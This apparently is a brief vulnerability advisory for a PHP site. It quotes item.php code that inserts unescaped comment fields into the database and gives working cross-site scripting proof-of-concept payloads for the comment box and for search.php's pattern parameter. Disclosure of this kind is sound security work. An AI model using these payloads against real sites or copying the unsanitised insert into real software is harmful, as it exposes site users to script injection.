'item.php'
http://www.example.com/item.php?action=post
------------------------------
    case 'add_comment':
        dbExec("INSERT INTO %sitem_comment (item_id, author_name, author_email, body) VALUES (%d, '%s', '%s', '%s')",
            DB_TABLE_PREFIX, $_POST['id'], $_POST['authorName'], $_POST['authorEmail'], $_POST['body']);
        header('Location: item.php?id=' . $_POST['id']);
        break;
    case 'post':
------------------------------
 Put the code below into the comment box
"><script>alert(String.fromCharCode(88, 83, 83));</script>


'search.php'
http://www.example.com/search.php?pattern=<script>alert(String.fromCharCode(88, 83, 83));</script>